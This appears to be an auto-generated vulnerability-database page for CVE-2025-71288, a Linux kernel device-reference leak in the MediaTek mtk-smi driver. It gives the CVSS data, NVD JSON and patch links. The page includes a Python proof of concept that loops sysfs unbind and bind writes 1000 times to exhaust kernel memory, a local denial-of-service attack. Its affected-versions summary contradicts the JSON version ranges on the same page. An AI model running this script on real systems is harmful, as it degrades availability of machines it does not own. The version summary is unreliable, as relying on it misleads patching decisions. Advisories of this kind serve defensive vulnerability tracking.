Security Vulnerability Report
中文
CVE-2025-71288 CVSS 5.5 MEDIUM

CVE-2025-71288

Published: 2026-05-06 12:16:28
Last Modified: 2026-05-13 18:42:11
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: memory: mtk-smi: fix device leaks on common probe Make sure to drop the reference taken when looking up the SMI device during common probe on late probe failure (e.g. probe deferral) and on driver unbind.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.8
Linux Kernel 6.8.x
Linux Kernel 6.9.x
Linux Kernel 6.10.x
Linux Kernel 6.11.x
Linux Kernel 6.12.x (未打补丁前)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ PoC for CVE-2025-71288 This script attempts to trigger the device leak by repeatedly binding and unbinding the mtk-smi driver, causing memory exhaustion over time. """ import os import time import sys # Target driver path in sysfs DRIVER_PATH = "/sys/bus/platform/drivers/mtk-smi-larb" # Example device name, may vary based on hardware DEVICE_NAME = "mtk-smi-larb0" def trigger_leak(): try: # Unbind the device to trigger remove path with open(os.path.join(DRIVER_PATH, "unbind"), "w") as f: f.write(DEVICE_NAME) # Bind the device to trigger probe path (where leak occurs) with open(os.path.join(DRIVER_PATH, "bind"), "w") as f: f.write(DEVICE_NAME) print(f"[+] Cycle completed: {DEVICE_NAME}") except FileNotFoundError: print("[-] Driver or device not found. System may not be vulnerable or hardware differs.") sys.exit(1) except PermissionError: print("[-] Permission denied. Root privileges required.") sys.exit(1) except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": print("[*] Starting PoC for CVE-2025-71288...") print("[*] Monitor memory usage (e.g., top/htop/free) to observe leak.") for i in range(1000): trigger_leak() time.sleep(0.05) # Short delay to allow system processing print("[*] PoC execution finished.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71288", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:27.987", "lastModified": "2026-05-13T18:42:11.303", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmemory: mtk-smi: fix device leaks on common probe\n\nMake sure to drop the reference taken when looking up the SMI device\nduring common probe on late probe failure (e.g. probe deferral) and on\ndriver unbind."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.167", "matchCriteriaId": "2EDC6BAF-B710-4E26-B6AA-D68922EE7B43"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.130", "matchCriteriaId": "C57BB918-DF28-46B3-94F7-144176841267"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.77", "matchCriteriaId": "B3D12E00-E42D-4056-B354-BAD4903C03A5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.17", "matchCriteriaId": "A5E006E4-59C7-43C1-9231-62A72219F2BA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/6cfa038bddd710f544076ea2ef7792fc82fbedd6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9704564a70399c2787f5a7c5d347add721056e9d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/984992f31cfb71b25cd0a72ef51ceb5dd6f187e8", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b16599fedf49fd42d174fba342a0b56103df3169", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b44d090d6ca159d94b59ad4cc44ffdaca094df82", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b8b2cf42b94c0a8efe43279643935256a6f58b9f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.